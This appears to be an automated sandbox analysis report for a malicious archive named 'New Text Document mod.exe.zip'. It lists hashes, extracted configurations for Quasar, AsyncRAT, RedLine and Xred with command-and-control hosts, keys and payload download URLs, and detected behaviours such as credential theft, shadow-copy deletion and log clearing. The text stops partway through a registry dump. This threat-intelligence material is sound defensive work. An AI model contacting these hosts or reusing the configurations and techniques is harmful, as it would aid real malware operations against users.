Analysis
-
max time kernel
496s -
max time network
741s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
13-01-2025 17:32
Behavioral task
behavioral1
Sample
New Text Document mod.exe.zip
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe.zip
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe.zip
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe.zip
-
Size
392KB
-
MD5
209c2bed74ce311f3de2c3040f5cbd8b
-
SHA1
676dbe2bbf178ca27210c8a2e37aa9652f4e17d5
-
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
-
SHA512
44b5207ce1a79c220ed014b7803ba4f3b89b0aa81f2232e152da9e5c8004c164a281d8806843a10590e3c55b902ef5e3f359bc117b80b11d052fe60324709324
-
SSDEEP
6144:PiyQGVN3t3bmwUUoI7a+OjFjjGFEduVVZ4vELL2VzCGb49pRYCEheDmDUKUQWCCJ:P/HfRx7aNFXuhTL2I70SmpXCqry
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
quasar
1.4.1
Office04
other-little.gl.at.ply.gg:11758
fbbc34bd-7320-405e-aebb-d4c666ee475f
-
encryption_key
FEA99DED4EFE826DE2850621FD7919E62525FD26
-
install_name
DirectX111.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
DirectX
-
subdirectory
SubDir
Extracted
redline
1V
195.177.92.88:1912
Extracted
asyncrat
0.5.8
Default
0.tcp.in.ngrok.io:10147
38.240.58.195:6606
Q52IWD1RYgpZ
-
delay
3
-
install
false
-
install_file
Listopener.exe
-
install_folder
%AppData%
Extracted
redline
Standoff
89.23.101.77:1912
Extracted
quasar
1.3.0.0
Office04
20.107.53.25:25535
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
redline
first
212.56.41.77:1912
Extracted
quasar
1.4.1
RuntimeBroker
qrpn9be.localto.net:2810
fc5edab1-6e8f-4963-98aa-bd077e08750f
-
encryption_key
F749DCAC94A1FC3102D2B0CFBBFCB76086F86568
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
a7
Extracted
quasar
1.3.0.0
sigorta
217.195.197.170:1604
QSR_MUTEX_9WjAcLINYji1uqfzRt
-
encryption_key
B2vTTMiPGqHXv2xzSGYH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
ROBLOX EXECUTOR
192.168.50.1:4782
10.0.0.113:4782
LETSQOOO-62766.portmap.host:62766
89.10.178.51:4782
90faf922-159d-4166-b661-4ba16af8650e
-
encryption_key
FFEE70B90F5EBED6085600C989F1D6D56E2DEC26
-
install_name
windows 3543.exe
-
log_directory
roblox executor
-
reconnect_delay
3000
-
startup_key
windows background updater
-
subdirectory
windows updater
Extracted
asyncrat
0.5.7B
Default
wzt5xcg.localto.net:1604
wzt5xcg.localto.net:5274
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
KYGOClient.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Meduza Stealer payload 2 IoCs
resource yara_rule behavioral3/memory/3240-1259-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral3/memory/3240-1256-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza -
Meduza family
-
description flow ioc Process 372 api.ipify.org Process not Found 497 ip-api.com Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe 371 api.ipify.org Process not Found 558 api.ipify.org Process not Found 681 api.ipify.org Process not Found 686 ipinfo.io Process not Found -
Quasar family
-
Quasar payload 11 IoCs
resource yara_rule behavioral3/files/0x00290000000461b3-175.dat family_quasar behavioral3/memory/2136-188-0x0000000000E00000-0x0000000001124000-memory.dmp family_quasar behavioral3/memory/1548-2772-0x0000000000950000-0x00000000009AE000-memory.dmp family_quasar behavioral3/files/0x00270000000464ba-2867.dat family_quasar behavioral3/memory/7704-2878-0x0000000000D00000-0x0000000001024000-memory.dmp family_quasar behavioral3/files/0x00280000000464a1-2912.dat family_quasar behavioral3/memory/7956-2921-0x0000000000AA0000-0x0000000000DC4000-memory.dmp family_quasar behavioral3/memory/8076-2924-0x00000000006D0000-0x000000000072E000-memory.dmp family_quasar behavioral3/memory/8056-2972-0x0000000000040000-0x0000000000364000-memory.dmp family_quasar behavioral3/memory/7952-3002-0x0000000000550000-0x0000000000874000-memory.dmp family_quasar behavioral3/memory/8600-7038-0x00000000003B0000-0x00000000006D4000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral3/files/0x002e0000000461d8-209.dat family_redline behavioral3/memory/3324-219-0x0000000000010000-0x0000000000062000-memory.dmp family_redline behavioral3/memory/960-2770-0x0000000000E70000-0x0000000000EC2000-memory.dmp family_redline behavioral3/files/0x00270000000464b5-2794.dat family_redline behavioral3/memory/7300-2808-0x0000000000650000-0x00000000006A2000-memory.dmp family_redline -
Redline family
-
XMRig Miner payload 4 IoCs
resource yara_rule behavioral3/files/0x00270000000464af-2780.dat family_xmrig behavioral3/files/0x00270000000464af-2780.dat xmrig behavioral3/files/0x00270000000464c8-5446.dat family_xmrig behavioral3/files/0x00270000000464c8-5446.dat xmrig -
Xmrig family
-
Xred family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral3/files/0x00270000000464ab-2638.dat family_asyncrat behavioral3/files/0x00270000000464b9-2823.dat family_asyncrat behavioral3/files/0x00270000000464e6-3577.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
pid Process 8668 powershell.EXE 6868 powershell.exe 1316 powershell.exe 6956 powershell.exe -
Contacts a large (542) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation gem1.exe -
Executes dropped EXE 12 IoCs
pid Process 1428 New Text Document mod.exe 1832 ._cache_New Text Document mod.exe 1668 Synaptics.exe 2136 voidware_loader.exe 3324 build.exe 4332 DirectX111.exe 5572 gem2.exe 3808 gem1.exe 3240 gem1.exe 6048 New Text Document mod.exe 388 ._cache_New Text Document mod.exe 6932 Lightshot.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe -
Loads dropped DLL 4 IoCs
pid Process 1668 Synaptics.exe 1668 Synaptics.exe 6048 New Text Document mod.exe 6048 New Text Document mod.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 58 drive.google.com 479 0.tcp.in.ngrok.io 482 raw.githubusercontent.com 728 0.tcp.in.ngrok.io 19 raw.githubusercontent.com 20 raw.githubusercontent.com 56 drive.google.com 148 drive.google.com 483 raw.githubusercontent.com 501 raw.githubusercontent.com 57 drive.google.com 144 drive.google.com 147 drive.google.com 458 raw.githubusercontent.com 522 raw.githubusercontent.com -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 558 api.ipify.org 681 api.ipify.org 686 ipinfo.io 371 api.ipify.org 372 api.ipify.org 497 ip-api.com -
Power Settings 1 TTPs 16 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5236 powercfg.exe 5512 powercfg.exe 5624 powercfg.exe 5620 powercfg.exe 5288 powercfg.exe 5612 powercfg.exe 5680 powercfg.exe 4932 powercfg.exe 7868 powercfg.exe 5408 cmd.exe 4448 powercfg.exe 5708 powercfg.exe 7764 powercfg.exe 7700 powercfg.exe 7864 powercfg.exe 8784 powercfg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe gem2.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3808 set thread context of 3240 3808 gem1.exe 137 PID 5572 set thread context of 5692 5572 gem2.exe 166 -
resource yara_rule behavioral3/memory/5612-2607-0x00007FF7C29B0000-0x00007FF7C29C7000-memory.dmp upx behavioral3/memory/5612-2862-0x00007FF7C29B0000-0x00007FF7C29C7000-memory.dmp upx -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5124 sc.exe 4672 sc.exe 5396 sc.exe 3816 sc.exe 4996 sc.exe 5304 sc.exe 3036 sc.exe 3560 sc.exe 2592 sc.exe 2896 sc.exe 5324 sc.exe 2824 sc.exe 1324 sc.exe 3876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 5148 3808 WerFault.exe 135 9140 8008 WerFault.exe 290 8592 9016 WerFault.exe 298 4548 8412 WerFault.exe 304 9084 8008 WerFault.exe 290 8056 8568 WerFault.exe 319 4900 6988 WerFault.exe 420 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 8504 cmd.exe 6988 PING.EXE 4932 cmd.exe 2516 PING.EXE 5600 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral3/files/0x00280000000464ac-4869.dat nsis_installer_1 behavioral3/files/0x00280000000464ac-4869.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 2 IoCs
pid Process 3444 taskkill.exe 9000 taskkill.exe -
Modifies data under HKEY_USERS 47 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Modifies registry class 60 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "3" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Set value (data) 